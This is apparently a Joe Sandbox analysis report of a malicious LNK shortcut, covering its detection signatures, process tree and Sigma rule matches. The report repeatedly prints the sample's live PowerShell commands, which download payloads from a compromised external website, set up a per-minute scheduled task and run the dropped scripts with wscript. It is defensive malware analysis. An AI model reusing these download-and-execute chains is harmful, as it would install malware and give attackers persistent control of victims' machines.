Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
G9eWTvswoH.lnk

Overview

General Information

Sample name:G9eWTvswoH.lnk
renamed because original name is a hash value
Original sample name:9ee3acebaae539dc60ea9321cfcf27451f6f05afc80ae7f7a959f76a8d587839.lnk
Analysis ID:1567188
MD5:f7f1052c9d09d61490d8f116238af21e
SHA1:0f2550bb03f31716232de245a02823885f529e09
SHA256:9ee3acebaae539dc60ea9321cfcf27451f6f05afc80ae7f7a959f76a8d587839
Tags:lnkwww-italialife24-ituser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Powershell download and execute
AI detected suspicious sample
Machine Learning detection for sample
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7332 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ; MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7556 cmdline: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js " /tn ZA3XqiywQ MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • wscript.exe (PID: 7608 cmdline: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7668 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js " MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7812 cmdline: "C:\Windows\system32\schtasks.exe" /delete /tn evQtmlDaSRMzUk.js /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • wscript.exe (PID: 7828 cmdline: "C:\Windows\system32\wscript.exe" C:\ProgramData\V58W09DALJEK.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 5344 cmdline: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 4588 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js " MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 5644 cmdline: "C:\Windows\system32\schtasks.exe" /delete /tn evQtmlDaSRMzUk.js /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • wscript.exe (PID: 7452 cmdline: "C:\Windows\system32\wscript.exe" C:\ProgramData\V58W09DALJEK.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 5740 cmdline: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 3272 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js " MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7332JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 7332INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x7b7:$b3: ::UTF8.GetString(
    • 0x25b0d:$b3: ::UTF8.GetString(
    • 0x25d4e:$b3: ::UTF8.GetString(
    • 0x261ad:$b3: ::UTF8.GetString(
    • 0x265ce:$b3: ::UTF8.GetString(
    • 0x26c5f:$b3: ::UTF8.GetString(
    • 0x2e64f:$b3: ::UTF8.GetString(
    • 0x412a3:$b3: ::UTF8.GetString(
    • 0x60612:$b3: ::UTF8.GetString(
    • 0x6103b:$b3: ::UTF8.GetString(
    • 0x62331:$b3: ::UTF8.GetString(
    • 0x6255b:$b3: ::UTF8.GetString(
    • 0x62799:$b3: ::UTF8.GetString(
    • 0x65b8f:$b3: ::UTF8.GetString(
    • 0x65db9:$b3: ::UTF8.GetString(
    • 0x11207a:$b3: ::UTF8.GetString(
    • 0x166640:$b3: ::UTF8.GetString(
    • 0x1669cc:$b3: ::UTF8.GetString(
    • 0x166c25:$b3: ::UTF8.GetString(
    • 0x1afced:$b3: ::UTF8.GetString(
    • 0x1aff17:$b3: ::UTF8.GetString(

    Other

    SourceRuleDescriptionAuthorStrings
    amsi64_7332.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Potentially Suspicious PowerShell Child Processes
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js " /tn ZA3XqiywQ, CommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js " /tn ZA3XqiywQ, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7332, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js " /tn ZA3XqiywQ, ProcessId: 7556, ProcessName: schtasks.exe
      Sigma detected: Script Interpreter Execution From Suspicious Folder
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js, CommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js, ProcessId: 7608, ProcessName: wscript.exe
      Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js " /tn ZA3XqiywQ, CommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js " /tn ZA3XqiywQ, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7332, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js " /tn ZA3XqiywQ, ProcessId: 7556, ProcessName: schtasks.exe
      Sigma detected: Suspicious Invoke-WebRequest Execution
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js ", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js ", CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js, ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7608, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js ", ProcessId: 7668, ProcessName: powershell.exe
      Sigma detected: Suspicious Script Execution From Temp Folder
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js, CommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js, ProcessId: 7608, ProcessName: wscript.exe
      Sigma detected: WScript or CScript Dropper
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js, CommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js, ProcessId: 7608, ProcessName: wscript.exe
      Sigma detected: Potential Binary Or Script Dropper Via PowerShell
      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7332, TargetFilename: C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js
      Sigma detected: PowerShell Download Pattern
      Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;, ProcessId: 7332, ProcessName: powershell.exe
      Sigma detected: PowerShell Web Download
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;, ProcessId: 7332, ProcessName: powershell.exe
      Sigma detected: Suspicious Schtasks From Env Var Folder
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js " /tn ZA3XqiywQ, CommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js " /tn ZA3XqiywQ, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7332, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js " /tn ZA3XqiywQ, ProcessId: 7556, ProcessName: schtasks.exe
      Sigma detected: Usage Of Web Request Commands And Cmdlets
      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;, ProcessId: 7332, ProcessName: powershell.exe
      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js, CommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js, CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js, ProcessId: 7608, ProcessName: wscript.exe
      Sigma detected: Non Interactive PowerShell Process Spawned
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = 